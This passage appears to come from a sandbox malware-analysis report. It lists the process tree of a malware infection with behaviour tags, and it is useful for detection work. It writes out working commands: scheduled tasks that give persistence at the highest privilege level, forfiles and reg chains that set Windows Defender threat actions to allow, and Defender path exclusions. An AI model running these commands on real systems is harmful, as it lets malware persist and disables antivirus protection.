      schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_a6fe0fbb21b26cb805391b2ef50d90c9\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_a6fe0fbb21b26cb805391b2ef50d90c9 HR" /sc HOURLY /rl HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:6484
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_a6fe0fbb21b26cb805391b2ef50d90c9\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_a6fe0fbb21b26cb805391b2ef50d90c9 LG" /sc ONLOGON /rl HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:6912
  - - C:\Users\Admin\AppData\Local\Temp\spanXaenVGFeEN8i\ljA2KGW8PjGmGdhFKTAg.exe
      "C:\Users\Admin\AppData\Local\Temp\spanXaenVGFeEN8i\ljA2KGW8PjGmGdhFKTAg.exe"
      4⤵
      PID:3160
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_eeb341036f887f8bfa41fe84e80e9357\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_eeb341036f887f8bfa41fe84e80e9357 HR" /sc HOURLY /rl HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:6200
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_eeb341036f887f8bfa41fe84e80e9357\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_eeb341036f887f8bfa41fe84e80e9357 LG" /sc ONLOGON /rl HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:6776
  - - C:\Users\Admin\AppData\Local\Temp\spanXaenVGFeEN8i\aCPW6UqbJw0nvDr0EAkf.exe
      "C:\Users\Admin\AppData\Local\Temp\spanXaenVGFeEN8i\aCPW6UqbJw0nvDr0EAkf.exe"
      4⤵
      PID:3720
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_59a51ce925308c493d91f644e0f356f0\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_59a51ce925308c493d91f644e0f356f0 HR" /sc HOURLY /rl HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:6968
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_59a51ce925308c493d91f644e0f356f0\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_59a51ce925308c493d91f644e0f356f0 LG" /sc ONLOGON /rl HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:7028
  - - C:\Users\Admin\AppData\Local\Temp\spanXaenVGFeEN8i\M5TSebsdhfBMOKGN8Nu0.exe
      "C:\Users\Admin\AppData\Local\Temp\spanXaenVGFeEN8i\M5TSebsdhfBMOKGN8Nu0.exe"
      4⤵
      PID:6720
  - - C:\Users\Admin\AppData\Local\Temp\spanXaenVGFeEN8i\kzH79s4zadMW70fPJl8s.exe
      "C:\Users\Admin\AppData\Local\Temp\spanXaenVGFeEN8i\kzH79s4zadMW70fPJl8s.exe"
      4⤵
      PID:4388
- - C:\Users\Admin\AppData\Local\Temp\1000011001\installer.exe
    "C:\Users\Admin\AppData\Local\Temp\1000011001\installer.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4164

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4604
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  - Executes dropped EXE
  PID:4860
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  - Executes dropped EXE
  PID:704
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  - Executes dropped EXE
  PID:2084
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  - Executes dropped EXE
  PID:4528
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  - Executes dropped EXE
  PID:2352
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  - Executes dropped EXE
  PID:5456
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  PID:6788
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  PID:6092

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4420
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:4452
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  - Executes dropped EXE
  PID:1032
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  - Executes dropped EXE
  PID:4372
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  - Executes dropped EXE
  PID:4480
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  - Executes dropped EXE
  PID:4132
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  - Executes dropped EXE
  PID:2992
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  - Executes dropped EXE
  PID:5556
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  PID:7796
- C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
  "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
  2⤵
  PID:304

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:808
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:356
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  - Executes dropped EXE
  PID:4700
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  - Executes dropped EXE
  PID:3400
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  - Executes dropped EXE
  PID:5060
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  - Executes dropped EXE
  PID:3220
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  - Executes dropped EXE
  PID:2880
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  - Executes dropped EXE
  PID:5660
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  PID:1800
- C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
  2⤵
  PID:6496

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:324

C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:528

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5432

C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5440

C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
1⤵
- Executes dropped EXE
PID:5624

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:1384

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:2616

C:\Users\Admin\AppData\Local\Temp\7zSF090.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSF090.tmp\Install.exe it /rAjdidZQtj 385118 /S
1⤵
PID:1980
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:5132
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:5876
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:1836
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:1628
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:356
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:4584
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:4288
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:1836
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:6392
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:6428
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:6588
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:6632
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:6736
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:6868
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:6888
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7080
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:6496
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:4496
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1436
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:5404
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5176
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6712
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6692
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7160
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6992
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5156
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7040
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7032
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4020
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2276
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4708
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2336
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6544
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6884
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7120
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7024
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6660
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5144
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2064
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6768
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7100
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6792
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3628
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2152
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1352
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5052
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1332
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files 